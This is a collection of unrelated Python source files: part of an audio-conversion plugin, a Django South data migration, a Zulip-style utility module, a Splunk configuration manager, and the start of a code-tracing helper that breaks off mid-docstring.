util.displayable_path(item.path))
continue
if keep_new:
if pretend:
self._log.info(u'mv {0} {1}',
util.displayable_path(item.path),
util.displayable_path(original))
else:
self._log.info(u'Moving to {0}',
util.displayable_path(original))
util.move(item.path, original)
if should_transcode(item, fmt):
try:
self.encode(command, original, converted, pretend)
except subprocess.CalledProcessError:
continue
else:
if pretend:
self._log.info(u'cp {0} {1}',
util.displayable_path(original),
util.displayable_path(converted))
else:
# No transcoding necessary.
self._log.info(u'Copying {0}',
util.displayable_path(item.path))
util.copy(original, converted)
if pretend:
continue
# Write tags from the database to the converted file.
item.try_write(path=converted)
if keep_new:
# If we're keeping the transcoded file, read it again (after
# writing) to get new bitrate, duration, etc.
item.path = converted
item.read()
item.store() # Store new path and audio data.
if self.config['embed']:
album = item.get_album()
if album and album.artpath:
self._log.debug(u'embedding album art from {}',
util.displayable_path(album.artpath))
art.embed_item(self._log, item, album.artpath,
itempath=converted)
if keep_new:
plugins.send('after_convert', item=item,
dest=dest, keepnew=True)
else:
plugins.send('after_convert', item=item,
dest=converted, keepnew=False)
def copy_album_art(self, album, dest_dir, path_formats, pretend=False):
"""Copies or converts the associated cover art of the album. Album must
have at least one track.
"""
if not album or not album.artpath:
return
album_item = album.items().get()
# Album shouldn't be empty.
if not album_item:
return
# Get the destination of the first item (track) of the album, we use
# this function to format the path accordingly to path_formats.
dest = album_item.destination(basedir=dest_dir,
path_formats=path_formats)
# Remove item from the path.
dest = os.path.join(*util.components(dest)[:-1])
dest = album.art_destination(album.artpath, item_dir=dest)
if album.artpath == dest:
return
if not pretend:
util.mkdirall(dest)
if os.path.exists(util.syspath(dest)):
self._log.info(u'Skipping {0} (target file exists)',
util.displayable_path(album.artpath))
return
# Decide whether we need to resize the cover-art image.
resize = False
maxwidth = None
if self.config['album_art_maxwidth']:
maxwidth = self.config['album_art_maxwidth'].get(int)
size = ArtResizer.shared.get_size(album.artpath)
self._log.debug('image size: {}', size)
if size:
resize = size[0] > maxwidth
else:
self._log.warning(u'Could not get size of image (please see '
u'documentation for dependencies).')
# Either copy or resize (while copying) the image.
if resize:
self._log.info(u'Resizing cover art from {0} to {1}',
util.displayable_path(album.artpath),
util.displayable_path(dest))
if not pretend:
ArtResizer.shared.resize(maxwidth, album.artpath, dest)
else:
if pretend:
self._log.info(u'cp {0} {1}',
util.displayable_path(album.artpath),
util.displayable_path(dest))
else:
self._log.info(u'Copying cover art to {0}',
util.displayable_path(album.artpath),
util.displayable_path(dest))
util.copy(album.artpath, dest)
def convert_func(self, lib, opts, args):
if not opts.dest:
opts.dest = self.config['dest'].get()
if not opts.dest:
raise ui.UserError(u'no convert destination set')
opts.dest = util.bytestring_path(opts.dest)
if not opts.threads:
opts.threads = self.config['threads'].get(int)
if self.config['paths']:
path_formats = ui.get_path_formats(self.config['paths'])
else:
path_formats = ui.get_path_formats()
if not opts.format:
opts.format = self.config['format'].get(unicode).lower()
pretend = opts.pretend if opts.pretend is not None else \
self.config['pretend'].get(bool)
if not pretend:
ui.commands.list_items(lib, ui.decargs(args), opts.album)
if not (opts.yes or ui.input_yn(u"Convert? (Y/n)")):
return
if opts.album:
albums = lib.albums(ui.decargs(args))
items = (i for a in albums for i in a.items())
if self.config['copy_album_art']:
for album in albums:
self.copy_album_art(album, opts.dest, path_formats,
pretend)
else:
items = iter(lib.items(ui.decargs(args)))
convert = [self.convert_item(opts.dest,
opts.keep_new,
path_formats,
opts.format,
pretend)
for _ in range(opts.threads)]
pipe = util.pipeline.Pipeline([items, convert])
pipe.run_parallel()
def convert_on_import(self, lib, item):
"""Transcode a file automatically after it is imported into the
library.
"""
fmt = self.config['format'].get(unicode).lower()
if should_transcode(item, fmt):
command, ext = get_format()
# Create a temporary file for the conversion.
tmpdir = self.config['tmpdir'].get()
fd, dest = tempfile.mkstemp('.' + ext, dir=tmpdir)
os.close(fd)
dest = util.bytestring_path(dest)
_temp_files.append(dest) # Delete the transcode later.
# Convert.
try:
self.encode(command, item.path, dest)
except subprocess.CalledProcessError:
return
# Change the newly-imported database entry to point to the
# converted file.
item.path = dest
item.write()
item.read() # Load new audio information data.
item.store()
def _cleanup(self, task, session):
for path in task.old_paths:
if path in _temp_files:
if os.path.isfile(path):
util.remove(path)
_temp_files.remove(path)
|
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
for n in orm.NetworkGroup.objects.all():
if n.youtube:
n.youtube_url = 'https://www.youtube.com/user/' + n.youtube
n.save()
def backwards(self, orm):
raise RuntimeError('This migration cannot be reversed')
models = {
'cms.cmsplugin': {
'Meta': {'object_name': 'CMSPlugin'},
'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}),
'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}),
'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'cms.placeholder': {
'Meta': {'object_name': 'Placeholder'},
'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'})
},
u'organisation.board': {
'Meta': {'object_name': 'Board'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['organisation.Person']", 'through': u"orm['organisation.BoardMembership']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.boardmembership': {
'Meta': {'object_name': 'BoardMembership'},
'board': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.Board']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.Person']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.featuredproject': {
'Meta': {'object_name': 'FeaturedProject', '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['organisation.Project']"})
},
u'organisation.featuredtheme': {
'Meta': {'object_name': 'FeaturedTheme', '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'theme': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'+'", 'to': u"orm['organisation.Theme']"})
},
u'organisation.networkgroup': {
'Meta': {'ordering': "('country', 'region')", 'unique_together': "(('country', 'region'),)", 'object_name': 'NetworkGroup'},
'country': ('django_countries.fields.CountryField', [], {'max_length': '2'}),
'country_slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'extra_information': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'facebook_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'group_type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'homepage_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mailinglist_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['organisation.Person']", 'through': u"orm['organisation.NetworkGroupMembership']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'position': ('geoposition.fields.GeopositionField', [], {'default': "'0,0'", 'max_length': '42', 'null': 'True', 'blank': 'True'}),
'region': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'region_slug': ('django.db.models.fields.SlugField', [], {'default': 'None', 'max_length': '50'}),
'twitter': ('django.db.models.fields.CharField', [], {'max_length': '18', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'working_groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['organisation.WorkingGroup']", 'symmetrical': 'False', 'blank': 'True'}),
'youtube': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'youtube_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
u'organisation.networkgrouplist': {
'Meta': {'object_name': 'NetworkGroupList', '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'group_type': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'organisation.networkgroupmembership': {
'Meta': {'ordering': "['-order', 'person__name']", 'object_name': 'NetworkGroupMembership'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'networkgroup': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.NetworkGroup']"}),
'order': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.Person']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.person': {
'Meta': {'ordering': "['name']", 'object_name': 'Person'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'photo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'twitter': ('django.db.models.fields.CharField', [], {'max_length': '18', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
u'organisation.project': {
'Meta': {'ordering': "('name',)", 'object_name': 'Project'},
'banner': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'homepage_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mailinglist_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'picture': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}),
'sourcecode_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'teaser': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'themes': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['organisation.Theme']", 'symmetrical': 'False', 'blank': 'True'}),
'twitter': ('django.db.models.fields.CharField', [], {'max_length': '18', 'blank': 'True'}),
'types': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['organisation.ProjectType']", 'symmetrical': 'False', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.projectlist': {
'Meta': {'object_name': 'ProjectList', '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'project_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.ProjectType']", 'null': 'True', 'blank': 'True'}),
'theme': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.Theme']", 'null': 'True', 'blank': 'True'})
},
u'organisation.projecttype': {
'Meta': {'object_name': 'ProjectType'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.signupform': {
'Meta': {'object_name': 'SignupForm', '_ormbases': ['cms.CMSPlugin']},
u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Get Connected to Open Knowledge'", 'max_length': '50'})
},
u'organisation.theme': {
'Meta': {'object_name': 'Theme'},
'blurb': ('django.db.models.fields.TextField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'picture': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.unit': {
'Meta': {'ordering': "['-order', 'name']", 'object_name': 'Unit'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['organisation.Person']", 'through': u"orm['organisation.UnitMembership']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'order': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.unitmembership': {
'Meta': {'ordering': "['-order', 'person__name']", 'object_name': 'UnitMembership'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.Person']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'unit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['organisation.Unit']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'organisation.workinggroup': {
'Meta': {'ordering': "('name',)", 'object_name': 'WorkingGroup'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'homepage_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'incubation': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}),
'themes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'workinggroups'", 'blank': 'True', 'to': u"orm['organisation.Theme']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['organisation']
symmetrical = True
|
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from typing import Any, Callable, List, Optional, Sequence, TypeVar, Iterable, Set, Tuple, Text
from six import binary_type
import base64
import errno
import hashlib
import heapq
import itertools
import os
import sys
from time import sleep
from django.conf import settings
from django.http import HttpRequest
from six.moves import range, map, zip_longest
from zerver.lib.str_utils import force_text
T = TypeVar('T')
def statsd_key(val, clean_periods=False):
# type: (Any, bool) -> str
if not isinstance(val, str):
val = str(val)
if ':' in val:
val = val.split(':')[0]
val = val.replace('-', "_")
if clean_periods:
val = val.replace('.', '_')
return val
class StatsDWrapper(object):
"""Transparently either submit metrics to statsd
or do nothing without erroring out"""
# Backported support for gauge deltas
# as our statsd server supports them but supporting
# pystatsd is not released yet
def _our_gauge(self, stat, value, rate=1, delta=False):
# type: (str, float, float, bool) -> None
"""Set a gauge value."""
from django_statsd.clients import statsd
if delta:
value_str = '%+g|g' % (value,)
else:
value_str = '%g|g' % (value,)
statsd._send(stat, value_str, rate)
def __getattr__(self, name):
# type: (str) -> Any
# Hand off to statsd if we have it enabled
# otherwise do nothing
if name in ['timer', 'timing', 'incr', 'decr', 'gauge']:
if settings.STATSD_HOST != '':
from django_statsd.clients import statsd
if name == 'gauge':
return self._our_gauge
else:
return getattr(statsd, name)
else:
return lambda *args, **kwargs: None
raise AttributeError
statsd = StatsDWrapper()
# Runs the callback with slices of all_list of a given batch_size
def run_in_batches(all_list, batch_size, callback, sleep_time = 0, logger = None):
# type: (Sequence[T], int, Callable[[Sequence[T]], None], int, Optional[Callable[[str], None]]) -> None
if len(all_list) == 0:
return
limit = (len(all_list) // batch_size) + 1
for i in range(limit):
start = i*batch_size
end = (i+1) * batch_size
if end >= len(all_list):
end = len(all_list)
batch = all_list[start:end]
if logger:
logger("Executing %s in batch %s of %s" % (end-start, i+1, limit))
callback(batch)
if i != limit - 1:
sleep(sleep_time)
def make_safe_digest(string, hash_func=hashlib.sha1):
# type: (Text, Callable[[binary_type], Any]) -> Text
"""
return a hex digest of `string`.
"""
# hashlib.sha1, md5, etc. expect bytes, so non-ASCII strings must
# be encoded.
return force_text(hash_func(string.encode('utf-8')).hexdigest())
def log_statsd_event(name):
# type: (str) -> None
"""
Sends a single event to statsd with the desired name and the current timestamp
This can be used to provide vertical lines in generated graphs,
for example when doing a prod deploy, bankruptcy request, or
other one-off events
Note that to draw this event as a vertical line in graphite
you can use the drawAsInfinite() command
"""
event_name = "events.%s" % (name,)
statsd.incr(event_name)
def generate_random_token(length):
# type: (int) -> str
return str(base64.b16encode(os.urandom(length // 2)).decode('utf-8').lower())
def mkdir_p(path):
# type: (str) -> None
# Python doesn't have an analog to `mkdir -p` < Python 3.2.
try:
os.makedirs(path)
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def query_chunker(queries, id_collector=None, chunk_size=1000, db_chunk_size=None):
# type: (List[Any], Set[int], int, int) -> Iterable[Any]
'''
This merges one or more Django ascending-id queries into
a generator that returns chunks of chunk_size row objects
during each yield, preserving id order across all results..
Queries should satisfy these conditions:
- They should be Django filters.
- They should return Django objects with "id" attributes.
- They should be disjoint.
The generator also populates id_collector, which we use
internally to enforce unique ids, but which the caller
can pass in to us if they want the side effect of collecting
all ids.
'''
if db_chunk_size is None:
db_chunk_size = chunk_size // len(queries)
assert db_chunk_size >= 2
assert chunk_size >= 2
if id_collector is not None:
assert(len(id_collector) == 0)
else:
id_collector = set()
def chunkify(q, i):
# type: (Any, int) -> Iterable[Tuple[int, int, Any]]
q = q.order_by('id')
min_id = -1
while True:
assert db_chunk_size is not None # Hint for mypy, but also workaround for mypy bug #3442.
rows = list(q.filter(id__gt=min_id)[0:db_chunk_size])
if len(rows) == 0:
break
for row in rows:
yield (row.id, i, row)
min_id = rows[-1].id
iterators = [chunkify(q, i) for i, q in enumerate(queries)]
merged_query = heapq.merge(*iterators)
while True:
tup_chunk = list(itertools.islice(merged_query, 0, chunk_size))
if len(tup_chunk) == 0:
break
# Do duplicate-id management here.
tup_ids = set([tup[0] for tup in tup_chunk])
assert len(tup_ids) == len(tup_chunk)
assert len(tup_ids.intersection(id_collector)) == 0
id_collector.update(tup_ids)
yield [row for row_id, i, row in tup_chunk]
def _extract_subdomain(request):
# type: (HttpRequest) -> Text
domain = request.get_host().lower()
index = domain.find("." + settings.EXTERNAL_HOST)
if index == -1:
return ""
return domain[0:index]
def get_subdomain(request):
# type: (HttpRequest) -> Text
subdomain = _extract_subdomain(request)
if subdomain in settings.ROOT_SUBDOMAIN_ALIASES:
return ""
return subdomain
def is_subdomain_root_or_alias(request):
# type: (HttpRequest) -> bool
subdomain = _extract_subdomain(request)
return not subdomain or subdomain in settings.ROOT_SUBDOMAIN_ALIASES
def check_subdomain(realm_subdomain, user_subdomain):
# type: (Optional[Text], Optional[Text]) -> bool
if settings.REALMS_HAVE_SUBDOMAINS and realm_subdomain is not None:
if (realm_subdomain == "" and user_subdomain is None):
return True
if realm_subdomain != user_subdomain:
return False
return True
def split_by(array, group_size, filler):
# type: (List[Any], int, Any) -> List[List[Any]]
"""
Group elements into list of size `group_size` and fill empty cells with
`filler`. Recipe from https://docs.python.org/3/library/itertools.html
"""
args = [iter(array)] * group_size
return list(map(list, zip_longest(*args, fillvalue=filler)))
def is_remote_server(identifier):
# type: (Text) -> bool
"""
This function can be used to identify the source of API auth
request. We can have two types of sources, Remote Zulip Servers
and UserProfiles.
"""
return "@" not in identifier
|
|
"""
This module hanles configuration related stuff
"""
import os.path as op
from . import conf_endpoints as scmc
from . import data_input_endpoints as scmdi
from . import property_endpoints as scmp
from . import request as req
def conf_file2name(conf_file):
conf_name = op.basename(conf_file)
if conf_name.endswith(".conf"):
conf_name = conf_name[:-5]
return conf_name
class ConfManager(object):
def __init__(self, splunkd_uri, session_key, owner="nobody", app_name="-"):
"""
:app_name: when creating conf stanza, app_name is required to set not
to "-"
:owner: when creating conf stanza, app_name is required to set not
to "-"
"""
self.splunkd_uri = splunkd_uri
self.session_key = session_key
self.owner = owner
self.app_name = app_name
def set_appname(self, appname):
"""
This are cases we need edit/remove/create confs in different app
context. call this interface to switch app context before manipulate
the confs in different app context
"""
self.app_name = appname
def all_stanzas(self, conf_name, do_reload=False, ret_metadata=False):
"""
:return: a list of dict stanza objects if successful.
Otherwise raise exception
"""
if do_reload:
self.reload_conf(conf_name)
stanzas = scmc.get_conf(self.splunkd_uri, self.session_key,
"-", "-", conf_name)
return self._delete_metadata(stanzas, ret_metadata)
def all_stanzas_as_dicts(self, conf_name, do_reload=False,
ret_metadata=False):
"""
:return: a dict of dict stanza objects if successful.
otherwise raise exception
"""
stanzas = self.all_stanzas(conf_name, do_reload, ret_metadata)
return {stanza["name"]: stanza for stanza in stanzas}
def get_stanza(self, conf_name, stanza,
do_reload=False, ret_metadata=False):
"""
@return dict if success otherwise raise exception
"""
if do_reload:
self.reload_conf(conf_name)
stanzas = scmc.get_conf(self.splunkd_uri, self.session_key,
"-", "-", conf_name, stanza)
stanzas = self._delete_metadata(stanzas, ret_metadata)
return stanzas[0]
def reload_conf(self, conf_name):
scmc.reload_conf(self.splunkd_uri, self.session_key, "-", conf_name)
def enable_conf(self, conf_name, stanza):
scmc.operate_conf(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
conf_name, stanza, "enable")
def disable_conf(self, conf_name, stanza):
scmc.operate_conf(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
conf_name, stanza, "disable")
def get_property(self, conf_name, stanza, key, do_reload=False):
if do_reload:
self.reload_conf(conf_name)
return scmp.get_property(self.splunkd_uri, self.session_key,
"-", "-", conf_name, stanza, key)
def stanza_exist(self, conf_name, stanza):
return scmc.stanza_exist(self.splunkd_uri, self.session_key,
"-", "-", conf_name, stanza)
def create_stanza(self, conf_name, stanza, key_values):
scmc.create_stanza(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
conf_name, stanza, key_values)
def update_stanza(self, conf_name, stanza, key_values):
scmc.update_stanza(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
conf_name, stanza, key_values)
def delete_stanza(self, conf_name, stanza):
scmc.delete_stanza(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
conf_name, stanza)
def create_properties(self, conf_name, stanza):
scmp.create_properties(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
conf_name, stanza)
def update_properties(self, conf_name, stanza, key_values):
scmp.update_properties(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
conf_name, stanza, key_values)
def delete_stanzas(self, conf_name, stanzas):
"""
:param stanzas: list of stanzas
:return: list of failed stanzas
"""
failed_stanzas = []
for stanza in stanzas:
try:
self.delete_stanza(conf_name, stanza)
except Exception:
failed_stanzas.append(stanza)
return failed_stanzas
# data input management
def create_data_input(self, input_type, name, key_values=None):
scmdi.create_data_input(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
input_type, name, key_values)
def update_data_input(self, input_type, name, key_values):
scmdi.update_data_input(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
input_type, name, key_values)
def delete_data_input(self, input_type, name):
scmdi.delete_data_input(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
input_type, name)
def get_data_input(self, input_type, name=None, do_reload=False):
if do_reload:
self.reload_data_input(input_type)
return scmdi.get_data_input(self.splunkd_uri, self.session_key,
"-", "-", input_type, name)
def reload_data_input(self, input_type):
scmdi.reload_data_input(self.splunkd_uri, self.session_key,
"-", "-", input_type)
def enable_data_input(self, input_type, name):
scmdi.operate_data_input(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
input_type, name, "enable")
def disable_data_input(self, input_type, name):
scmdi.operate_data_input(self.splunkd_uri, self.session_key,
self.owner, self.app_name,
input_type, name, "disable")
def data_input_exist(self, input_type, name):
try:
result = self.get_data_input(input_type, name)
except req.ConfNotExistsException:
return False
return result is not None
def all_data_input_stanzas(self, input_type, do_reload=False,
ret_metadata=False):
stanzas = self.get_data_input(input_type, do_reload=do_reload)
for stanza in stanzas:
if "eai:acl" in stanza and "app" in stanza["eai:acl"]:
stanza["appName"] = stanza["eai:acl"]["app"]
stanza["userName"] = stanza["eai:acl"].get("owner", "nobody")
return self._delete_metadata(stanzas, ret_metadata)
def get_data_input_stanza(self, input_type, name, do_reload=False,
ret_metadata=False):
stanzas = self.get_data_input(input_type, name, do_reload)
stanzas = self._delete_metadata(stanzas, ret_metadata)
return stanzas[0]
def delete_data_input_stanzas(self, input_type, names):
"""
:param stanzas: list of stanzas
:return: list of failed stanzas
"""
failed_names = []
for name in names:
try:
self.delete_data_input(input_type, name)
except Exception:
failed_names.append(name)
return failed_names
def _delete_metadata(self, stanzas, ret_metadata):
if stanzas and not ret_metadata:
for stanza in stanzas:
for key in stanza.keys():
if key.startswith("eai:"):
del stanza[key]
return stanzas
|
|
import inspect
import gc
import sys
import os.path
import difflib
from earthdragon.func_util import get_parent
import pandas as pd
def is_property(code):
"""
Using some CPython gc magics, check if a code object is a property
gc idea taken from trace.py from stdlib
"""
# use of gc.get_referrers() was suggested by Michael Hudson
# all functions which refer to this code object
gc.collect()
code_refs = gc.get_referrers(code)
funcs = [f for f in code_refs
if inspect.isfunction(f)]
if len(funcs) != 1:
return False
# property object will reference the original func
props = [p for p in gc.get_referrers(funcs[0])
if isinstance(p, property)]
return len(props) == 1
def is_class_dict(dct):
if not isinstance(dct, dict):
return False
if '__dict__' not in dct \
or not inspect.isgetsetdescriptor(dct['__dict__']):
return False
return True
class Follow(object):
"""
Follows execution path.
Meant as a quick way to see what a function does.
In [2]: with Follow() as f:
...: df.sum()
...:
In [3]: f.pprint(depth=2)
stat_func generic.py:3542
_reduce frame.py:3995
_get_axis_number generic.py:285
_get_agg_axis frame.py:4128
